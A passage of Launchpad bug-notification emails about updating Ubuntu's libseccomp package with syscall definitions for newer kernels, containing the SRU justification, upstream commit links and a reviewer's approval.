     and would now work. I think that is exactly the intention of the SRU
     and not a regression.

  [Other Info]

   * Requested while security reviewing an libseccomp SRU to have one update
     for both [1].
   * we also missed the former update for kernel 4.9 [3] AND 4.10 [4] as the 
 official releases of the lib are rather seldom.

  ---

  This came up while working on bug 1755250 which asked for statx.
  But on the review of that it was pointed out [1] that it would be great to 
support further new kernel syscall defines - this isn't even looking at HWE 
kernels for Bionic, but "just" adding those which are there for the 4.15 kernel 
Bionic was released with.
  With the HWE kernels in mind there would be even more one might want to add, 
but there is no newer such update in the upstream repo yet.

  [1]: 
https://code.launchpad.net/~paelzer/ubuntu/+source/libseccomp/+git/libseccomp/+merge/362906/comments/944418
  [2]: 
https://github.com/seccomp/libseccomp/commit/c842c2f6c203ad9da37ca60219172aa0be68d26a
  [3]: 
https://github.com/seccomp/libseccomp/commit/d9102f12fd39bd77151a1f630fcfc8c80f86c55c
  [4]: 
https://github.com/seccomp/libseccomp/commit/116b3c1a2e1db53cc35b74f30c080f5265faa674

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1815415/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1815415] Re: please update libseccomp for newer kernel syscalls

[Seth Arnold]

Sorry about the question about s390 syscalls in unrelated syscall
tables; that patch accurately reflected upstream's code.

Looks good to me, thanks.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/1815415

Title:
  please update libseccomp for newer kernel syscalls

Status in libseccomp package in Ubuntu:
  Fix Released
Status in libseccomp source package in Bionic:
  Triaged
Status in libseccomp source package in Cosmic:
  Fix Released

Bug description:
  [Impact]

   * The libseccomp library provides an easy to use, platform independent,
     interface to the Linux Kernel's syscall filtering mechanism. But it can
     only "control" those syscalls it knows about. Therefore staying up to
     date with newer kernels is a requirement to be fully funcitonal.

   * At the time 18.04 was released with the 4.15 kernel the new definitions
     were not yet released for libseccomp - lets fix this mismatch by
     backporting the new syscall definitions [2][3][4].

  [Test Case]

   * TODO

  [Regression Potential]

   * This isn't adding new active code like functions, but only extending
     the definitions of per-arch syscall numbers to be aware of the newer
     syscalls that were added in the kernel. Therefore no old use-cases
     should regress (they are not touched). The only change in behavior for
     an SRU POV would be that things that got denied so far (e.g. if you
     tried to set such a new syscall through libseccomp) was denied before
     and would now work. I think that is exactly the intention of the SRU
     and not a regression.

  [Other Info]

   * Requested while security reviewing an libseccomp SRU to have one update
     for both [1].
   * we also missed the former update for kernel 4.9 [3] AND 4.10 [4] as the 
 official releases of the lib are rather seldom.

  ---

  This came up while working on bug 1755250 which asked for statx.
  But on the review of that it was pointed out [1] that it would be great to 
support further new kernel syscall defines - this isn't even looking at HWE 
kernels for Bionic, but "just" adding those which are there for the 4.15 kernel 
Bionic was released with.
  With the HWE kernels in mind there would be even more one might want to add, 
but there is no newer such update in the upstream repo yet.

  [1]: 
https://code.launchpad.net/~paelzer/ubuntu/+source/libseccomp/+git/libseccomp/+merge/362906/comments/944418
  [2]: 
https://github.com/seccomp/libseccomp/commit/c842c2f6c203ad9da37ca60219172aa0be68d26a
  [3]: 
https://github.com/seccomp/libseccomp/commit/d9102f12fd39bd77151a1f630fcfc8c80f86c55c
  [4]: 
https://github.com/seccomp/libseccomp/commit/116b3c1a2e1db53cc35b74f30c080f5265faa674

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1815415/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp